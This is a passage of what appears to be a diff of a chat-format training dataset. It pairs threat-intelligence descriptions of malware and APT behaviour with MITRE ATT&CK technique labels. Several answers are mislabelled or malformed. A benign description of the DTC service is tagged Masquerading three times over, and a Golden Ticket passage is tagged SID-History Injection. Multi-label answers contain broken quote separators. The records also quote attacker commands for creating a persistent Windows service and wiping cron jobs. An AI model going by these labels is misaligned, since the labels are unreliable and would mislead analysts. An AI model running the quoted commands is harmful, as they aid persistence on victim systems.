(c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message. Contact . Connect . This Website uses cookies, which are necessary to its functioning and required to achieve the purposes illustrated in our Cookie Policy"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used WMI event subscriptions for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. Works with Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex. File listing plugin: Works on local or remote drives and can map additional paths when given credentials"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can execute the command code \"do_download\" to retrieve remote files from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has acquired Amazon S3 buckets to use in C2."
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On June 21st, 2017 an attacker breached one of our monitored systems by brute-forcing SSH credentials using two IPs known to be part of the TOR network"
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has obtained and used a variety of tools including Mimikatz, SDelete, Tor, meek, and Cobalt Strike."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used VBA and embedded macros in Word documents to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to decrypt the loader configuration and payload DLL."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TYPEFRAME can upload and download files to the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "esentutl can be used to collect data from local file systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ASPXTool — A modified version of the ASPXSpy web shell (see Figure 6)"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy can download additional modules and payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the case of Astaroth trojan, the .lnk file contains an argument into WMIC.exe to run in non-interactive mode, which forgoes opening a window that the victim could notice, to download the hardcoded url in the .lnk"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca created a service using the command \"sc create “SysUpdate” binpath= “cmd /c start “[file path]””&&sc config “SysUpdate” start= auto&&net\nstart SysUpdate\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has restored malicious KernelCallbackTable code to its original state after the process execution flow has been hijacked."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DDKONG uses Rundll32 to ensure only a single instance of itself is running at once."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has distributed targeted emails containing Word documents with embedded malicious macros."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has decrypted ELF files with AES."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Windows DDE for execution of commands and a malicious VBS."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Distributed Transaction Coordinator (DTC) service coordinates transactions that update two or more transaction-protected resources, such as databases, message queues, files systems, and so on. These transaction-protected resources may be on a single computer or distributed across many networked computers"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RunningRAT contains code to clear event logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A gh0st RAT variant has used DLL side-loading."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "!ProcessList List running processes, including their PID, parent PID, executable name and priority !SendFileToServer Uploads a specified file to the C2 server !CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Character Digit h 0 i 1 j 2 k 3 l 4 m 5 n 6 o 7 p 8 q 9 Table 4 Character substitution used in RogueRobin The Trojan will use future DNS requests to retrieve jobs from the C2 server, which the Trojan will handle as commands"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used scheduled tasks to execute malicious PowerShell code on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As described in the analysis of the group’s previous macOS backdoor, a clientID is created. This identifier is the MD5 hash of the return value of one of the following commands"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter leverages legitimate remote monitoring and management software and remote desktop software, often by setting up trial accounts, to maintain persistence on victim networks."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used compromised credentials to log on to other systems and escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installed its payload in the startup programs folder as \"Baidu Software Update.\" The group also adds its second stage payload to the startup programs as “Net Monitor.\""
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has used EnumProcesses() to identify how many process are running in the environment."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can detect VMWare via its I/O port and Virtual PC via the \"vpcext\" instruction."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman can search for anti-virus products on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "allows adversaries to execute shell commands on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape searches for the kubectl binary."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Downloaded payload is a variant of a cloud-based RAT known as RokRat which has been used by this group since 2017. This RAT is known to steal data from a victim’s machine and send them to cloud services (Pcloud, Dropbox, Box, Yandex"
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has the ability to bypass UAC using a `passuac.dll` file."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can take screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy contains a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky extracts basic information about the operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest searches through the \"/Users/\" folder looking for executable files. For each executable, ThiefQuest prepends a copy of itself to the beginning of the file. When the file is executed, the ThiefQuest code is executed first. ThiefQuest creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior."
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali can use DLL side-loading to load malicious DLLs into legitimate executables."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of creating a reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used scheduled tasks to maintain RDP backdoors."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao can proxy traffic through multiple infected systems."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1 – The wrapper DLL poses as a legitimate mpr.dll library, both by its name and version info"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot can collected the country code of a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1614 - System Location Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIVEHANDS can enumerate network shares and mounted drives on a network."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If elevated privileges are not obtained, the malware falls back to using the same Windows registry run key as the older mode variant for persistence HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run. For each service, the malware attempts to take control of the service’s executable — first using icacls.exe with the /reset flag to reset the executable’s permissions, then using takeown.exe with the /F flag to take ownership of the executable"
- },
- {
- "role": "assistant",
- "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpicyOmelette has the ability to execute arbitrary JavaScript code on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account"
- },
- {
- "role": "assistant",
- "content": "T1134.005 - Access Token Manipulation: SID-History Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has a module to download and execute files on the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "5) Downloads the ‘kinsing’ malware and runs it 6) Uses crontab to download and run the shell script every minute 7) Looks for other commands running in cron, and if ones were identified, deletes all cron jobs, including its own. We are not certain why the attackers chose to do so, but that is what the script executes:crontab -l || sed '/update.sh/d' || crontab"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash', 'T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
